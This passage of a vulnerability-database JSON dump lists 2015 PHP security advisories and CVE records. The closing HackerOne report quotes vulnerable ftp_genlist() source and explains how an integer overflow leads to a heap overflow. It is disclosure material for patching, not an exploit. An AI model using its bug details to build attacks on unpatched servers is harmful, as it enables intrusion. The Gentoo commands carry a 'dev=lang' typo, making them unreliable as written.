restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.", "published": "2015-06-09T14:59:08", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4026", "cvelist": ["CVE-2015-4026"], "lastseen": "2018-01-05T11:51:41"}, {"id": "CVE-2015-4022", "type": "cve", "title": "CVE-2015-4022", "description": "Integer overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.", "published": "2015-06-09T14:59:05", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4022", "cvelist": ["CVE-2015-4022"], "lastseen": "2018-01-05T11:51:41"}], "debian": [{"id": "DSA-3280", "type": "debian", "title": "php5 -- security update", "description": "Multiple vulnerabilities have been discovered in PHP:\n\n * [CVE-2015-4025](<https://security-tracker.debian.org/tracker/CVE-2015-4025>) / [CVE-2015-4026](<https://security-tracker.debian.org/tracker/CVE-2015-4026>)\n\nMultiple function didn't check for NULL bytes in path names.\n\n * [CVE-2015-4024](<https://security-tracker.debian.org/tracker/CVE-2015-4024>)\n\nDenial of service when processing multipart/form-data requests.\n\n * [CVE-2015-4022](<https://security-tracker.debian.org/tracker/CVE-2015-4022>)\n\nInteger overflow in the ftp_genlist() function may result in denial of service or potentially the execution of arbitrary code.\n\n * [CVE-2015-4021](<https://security-tracker.debian.org/tracker/CVE-2015-4021>) [CVE-2015-3329](<https://security-tracker.debian.org/tracker/CVE-2015-3329>) [CVE-2015-2783](<https://security-tracker.debian.org/tracker/CVE-2015-2783>)\n\nMultiple vulnerabilities in the phar extension may result in denial of service or potentially the execution of arbitrary code when processing malformed archives.\n\nFor the oldstable distribution (wheezy), these problems have been fixed in version 5.4.41-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in version 5.6.9+dfsg-0+deb8u1.\n\nFor the testing distribution (stretch), these problems have been fixed in version 5.6.9+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in version 5.6.9+dfsg-1.\n\nWe recommend that you upgrade your php5 packages.", "published": "2015-06-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://www.debian.org/security/dsa-3280", "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "lastseen": "2016-09-02T18:24:06"}, {"id": "DLA-307", "type": "debian", "title": "php5 -- LTS security update", "description": "* [CVE-2015-3307](<https://security-tracker.debian.org/tracker/CVE-2015-3307>)\n\nThe phar_parse_metadata function in ext/phar/phar.c in PHP before 5.4.40, 5.5.x before 5.5.24, and 5.6.x before 5.6.8 allows remote attackers to cause a denial of service (heap metadata corruption) or possibly have unspecified other impact via a crafted tar archive.\n\n * [CVE-2015-3411](<https://security-tracker.debian.org/tracker/CVE-2015-3411>) \\+ [CVE-2015-3412](<https://security-tracker.debian.org/tracker/CVE-2015-3412>)\n\nFixed bug #69353 (Missing null byte checks for paths in various PHP extensions).\n\n * [CVE-2015-4021](<https://security-tracker.debian.org/tracker/CVE-2015-4021>)\n\nThe phar_parse_tarfile function in ext/phar/tar.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 does not verify that the first character of a filename is different from the \\0 character, which allows remote attackers to cause a denial of service (integer underflow and memory corruption) via a crafted entry in a tar archive.\n\n * [CVE-2015-4022](<https://security-tracker.debian.org/tracker/CVE-2015-4022>)\n\nInteger overflow in the ftp_genlist function in ext/ftp/ftp.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote FTP servers to execute arbitrary code via a long reply to a LIST command, leading to a heap-based buffer overflow.\n\n * [CVE-2015-4025](<https://security-tracker.debian.org/tracker/CVE-2015-4025>)\n\nPHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2006-7243](<https://security-tracker.debian.org/tracker/CVE-2006-7243>).\n\n * [CVE-2015-4026](<https://security-tracker.debian.org/tracker/CVE-2015-4026>)\n\nThe pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \\x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for [CVE-2006-7243](<https://security-tracker.debian.org/tracker/CVE-2006-7243>).\n\n * [CVE-2015-4147](<https://security-tracker.debian.org/tracker/CVE-2015-4147>)\n\nThe SoapClient::__call method in ext/soap/soap.c in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 does not verify that __default_headers is an array, which allows remote attackers to execute arbitrary code by providing crafted serialized data with an unexpected data type, related to a type confusion issue.\n\n * [CVE-2015-4148](<https://security-tracker.debian.org/tracker/CVE-2015-4148>)\n\nThe do_soap_call function in ext/soap/soap.c in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 does not verify that the uri property is a string, which allows remote attackers to obtain sensitive information by providing crafted serialized data with an int data type, related to a type confusion issue.\n\n * [CVE-2015-4598](<https://security-tracker.debian.org/tracker/CVE-2015-4598>)\n\nIncorrect handling of paths with NULs.\n\n * [CVE-2015-4599](<https://security-tracker.debian.org/tracker/CVE-2015-4599>)\n\nType confusion vulnerability in exception::getTraceAsString.\n\n * [CVE-2015-4600](<https://security-tracker.debian.org/tracker/CVE-2015-4600>) \\+ [CVE-2015-4601](<https://security-tracker.debian.org/tracker/CVE-2015-4601>)\n\nAdded type checks.\n\n * [CVE-2015-4602](<https://security-tracker.debian.org/tracker/CVE-2015-4602>)\n\nType Confusion Infoleak Vulnerability in unserialize() with SoapFault.\n\n * [CVE-2015-4604](<https://security-tracker.debian.org/tracker/CVE-2015-4604>) \\+ [CVE-2015-4605](<https://security-tracker.debian.org/tracker/CVE-2015-4605>)\n\ndenial of service when processing a crafted file with Fileinfo (already fixed in CVE-2015-temp-68819.patch).\n\n * [CVE-2015-4643](<https://security-tracker.debian.org/tracker/CVE-2015-4643>)\n\nImproved fix for bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow).\n\n * [CVE-2015-4644](<https://security-tracker.debian.org/tracker/CVE-2015-4644>)\n\nFixed bug #69667 (segfault in php_pgsql_meta_data).\n\n * [CVE-2015-5589](<https://security-tracker.debian.org/tracker/CVE-2015-5589>)\n\nSegfault in Phar::convertToData on invalid file.\n\n * [CVE-2015-5590](<https://security-tracker.debian.org/tracker/CVE-2015-5590>)\n\nBuffer overflow and stack smashing error in phar_fix_filepath.", "published": "2015-09-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/2015/dla-307", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-5590", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-5589", "CVE-2015-4643"], "lastseen": "2017-10-05T13:11:48"}], "oraclelinux": [{"id": "ELSA-2015-1219", "type": "oraclelinux", "title": "php54-php security update", "description": "[5.4.40-3]\n- fix more functions accept paths with NUL character #1213407\n[5.4.40-2]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- pgsql: fix NULL pointer dereference CVE-2015-1352", "published": "2016-02-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://linux.oracle.com/errata/ELSA-2015-1219.html", "cvelist": ["CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-4598", "CVE-2015-4643"], "lastseen": "2016-09-04T11:17:09"}, {"id": "ELSA-2015-1186", "type": "oraclelinux", "title": "php55-php security update", "description": "[5.5.21-4]\n- fix more functions accept paths with NUL character #1213407\n[5.5.21-3]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026, #1213407\n- fileinfo: fix denial of service when processing a crafted\n file #1213442\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- pgsql: fix NULL pointer dereference CVE-2015-1352\n- soap: fix type confusion through unserialize #1222538\n- apache2handler: fix pipelined request executed in deinitialized\n interpreter under httpd 2.4 CVE-2015-3330", "published": "2016-02-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2015-1186.html", "cvelist": ["CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4644", "CVE-2015-1352", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4598", "CVE-2015-4643"], "lastseen": "2016-09-04T11:16:04"}, {"id": "ELSA-2015-1135", "type": "oraclelinux", "title": "php security and bug fix update", "description": "[5.4.16-36]\n- fix more functions accept paths with NUL character #1213407\n[5.4.16-35]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026, #1213407\n- fileinfo: fix denial of service when processing a crafted\n file #1213442\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: fix type confusion through unserialize #1222538\n- apache2handler: fix pipelined request executed in deinitialized\n interpreter under httpd 2.4 CVE-2015-3330\n[5.4.16-34]\n- fix memory corruption in fileinfo module on big endian\n machines #1082624\n- fix segfault in pdo_odbc on x86_64 #1159892\n- fix segfault in gmp allocator #1154760\n[5.4.16-33]\n- core: use after free vulnerability in unserialize()\n CVE-2014-8142 and CVE-2015-0231\n- core: fix use-after-free in unserialize CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- exif: free called on unitialized pointer CVE-2015-0232\n- fileinfo: fix out of bounds read in mconvert CVE-2014-9652\n- gd: fix buffer read overflow in gd_gif_in.c CVE-2014-9709\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize\n[5.4.16-31]\n- fileinfo: fix out-of-bounds read in elf note headers. CVE-2014-3710\n[5.4.16-29]\n- xmlrpc: fix out-of-bounds read flaw in mkgmtime() CVE-2014-3668\n- core: fix integer overflow in unserialize() CVE-2014-3669\n- exif: fix heap corruption issue in exif_thumbnail() CVE-2014-3670\n[5.4.16-27]\n- gd: fix NULL pointer dereference in gdImageCreateFromXpm().\n CVE-2014-2497\n- gd: fix NUL byte injection in file names. CVE-2014-5120\n- fileinfo: fix extensive backtracking in regular expression\n (incomplete fix for CVE-2013-7345). CVE-2014-3538\n- fileinfo: fix mconvert incorrect handling of truncated\n pascal string size. CVE-2014-3478\n- fileinfo: fix cdf_read_property_info\n (incomplete fix for CVE-2012-1571). CVE-2014-3587\n- spl: fix use-after-free in ArrayIterator due to object\n change during sorting. CVE-2014-4698\n- spl: fix use-after-free in SPL Iterators. CVE-2014-4670\n- network: fix segfault in dns_get_record\n (incomplete fix for CVE-2014-4049). CVE-2014-3597\n[5.4.16-25]\n- fix segfault after startup on aarch64 (#1107567)\n- compile php with -O3 on ppc64le (#1123499)", "published": "2015-06-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2015-1135.html", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2013-7345", "CVE-2015-2783", "CVE-2015-3329", "CVE-2014-3478", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-3587", "CVE-2012-1571", "CVE-2014-9709", "CVE-2014-4670", "CVE-2014-3668", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-4021", "CVE-2014-3538", "CVE-2014-5120", "CVE-2014-3597", "CVE-2014-3710", "CVE-2015-4602", "CVE-2015-4026", "CVE-2014-4698", "CVE-2015-4147", "CVE-2015-3411", "CVE-2014-4049", "CVE-2015-4604", "CVE-2014-3670", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2014-2497", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-0231"], "lastseen": "2016-09-04T11:16:57"}, {"id": "ELSA-2015-1218", "type": "oraclelinux", "title": "php security update", "description": "[5.3.3-46]\n- fix gzfile accept paths with NUL character #1213407\n- fix patch for CVE-2015-4024\n[5.3.3-45]\n- fix more functions accept paths with NUL character #1213407\n[5.3.3-44]\n- soap: missing fix for #1222538 and #1204868\n[5.3.3-43]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4026, #1213407\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: more fix type confusion through unserialize #1222538\n[5.3.3-42]\n- soap: more fix type confusion through unserialize #1204868\n[5.3.3-41]\n- core: fix double in zend_ts_hash_graceful_destroy CVE-2014-9425\n- core: fix use-after-free in unserialize CVE-2015-2787\n- exif: fix free on unitialized pointer CVE-2015-0232\n- gd: fix buffer read overflow in gd_gif.c CVE-2014-9709\n- date: fix use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize", "published": "2015-07-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2015-1218.html", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "lastseen": "2016-09-04T11:15:55"}], "centos": [{"id": "CESA-2015:1135", "type": "centos", "title": "php security update", "description": "**CentOS Errata and Security Advisory** CESA-2015:1135\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/021191.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-embedded\nphp-enchant\nphp-fpm\nphp-gd\nphp-intl\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-mysqlnd\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-process\nphp-pspell\nphp-recode\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1135.html", "published": "2015-06-24T03:28:02", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/021191.html", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-0231"], "lastseen": "2017-10-03T18:26:04"}, {"id": "CESA-2015:1218", "type": "centos", "title": "php security update", "description": "**CentOS Errata and Security Advisory** CESA-2015:1218\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-July/021237.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-embedded\nphp-enchant\nphp-fpm\nphp-gd\nphp-imap\nphp-intl\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-process\nphp-pspell\nphp-recode\nphp-snmp\nphp-soap\nphp-tidy\nphp-xml\nphp-xmlrpc\nphp-zts\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1218.html", "published": "2015-07-09T19:23:41", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2015-July/021237.html", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "lastseen": "2017-10-03T18:26:33"}], "gentoo": [{"id": "GLSA-201606-10", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn attacker can possibly execute arbitrary code or create a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP 5.4 users should upgrade to the latest 5.5 stable branch, as PHP 5.4 is now masked in Portage: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.5.33\"\n \n\nAll PHP 5.5 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.5.33\"\n \n\nAll PHP 5.6 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev=lang/php-5.6.19\"", "published": "2016-06-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/201606-10", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-4644", "CVE-2015-6834", "CVE-2015-1352", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4642", "CVE-2015-4148", "CVE-2015-4025", "CVE-2015-4021", "CVE-2015-6836", "CVE-2015-4026", "CVE-2015-6833", "CVE-2015-4147", "CVE-2015-6831", "CVE-2015-4022", "CVE-2015-6837", "CVE-2015-7803", "CVE-2015-1351", "CVE-2015-6835", "CVE-2013-6501", "CVE-2015-4643", "CVE-2015-0231", "CVE-2015-6832", "CVE-2015-6838", "CVE-2015-7804"], "lastseen": "2016-09-06T19:47:07"}], "hackerone": [{"id": "H1:104027", "type": "hackerone", "title": "PHP (IBB): Memory Corruption in phar_parse_tarfile when entry filename starts with null", "description": "https://bugs.php.net/bug.php?id=69453", "published": "2015-04-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://hackerone.com/reports/104027", "cvelist": ["CVE-2015-4021"], "lastseen": "2018-04-19T17:34:07"}, {"id": "H1:73240", "type": "hackerone", "title": "PHP (IBB): Integer overflow in ftp_genlist() resulting in heap overflow", "description": "https://bugs.php.net/bug.php?id=69545\n\nDescription:\n------------\nThe ftp_genlist() function of the ftp extension is prone to an integer overflow, which may result in remote code execution.\n\n```\next/ftp/ftp.c:ftp_genlist(...)\n1826 size = 0;\n1827 lines = 0;\n1828 lastch = 0;\n1829 while ((rcvd = my_recv(ftp, data->fd, data->buf, FTP_BUFSIZE))) {\n1830 if (rcvd == -1) {\n1831 goto bail;\n1832 }\n1833\n1834 php_stream_write(tmpstream, data->buf, rcvd);\n1835\n1836 size += rcvd;\n1837 for (ptr = data->buf; rcvd; rcvd--, ptr++) {\n1838 if (*ptr == '\\n' && lastch == '\\r') {\n1839 lines++; // [0]\n1840 } else {\n1841 size++; // [1]\n1842 }\n1843 lastch = *ptr;\n1844 }\n1845 }\n```\n\nIn the above loop `size' or `lines' may overflow (at [0] respectively [1]).\nThis requires sending more than 2^32 bytes, which will be stored in a tempfile.\n\n```\n1851 ret = safe_emalloc((lines + 1), sizeof(char*), size); // [2]\n1852\n1853 entry = ret;\n1854 text = (char*) (ret + lines + 1);\n1855 *entry = text;\n1856 lastch = 0;\n1857 while ((ch = php_stream_getc(tmpstream)) != EOF) {\n1858 if (ch == '\\n' && lastch == '\\r') {\n1859 *(text - 1) = 0;\n1860 *++entry = text;\n1861 } else {\n1862 *text++ = ch; // [3]\n1863 }\n1864 lastch = ch;\n1865 }\n1866 *entry = NULL;\n```\n\nThis results in the allocated buffer at [2] being to small to hold the data written to\nthe 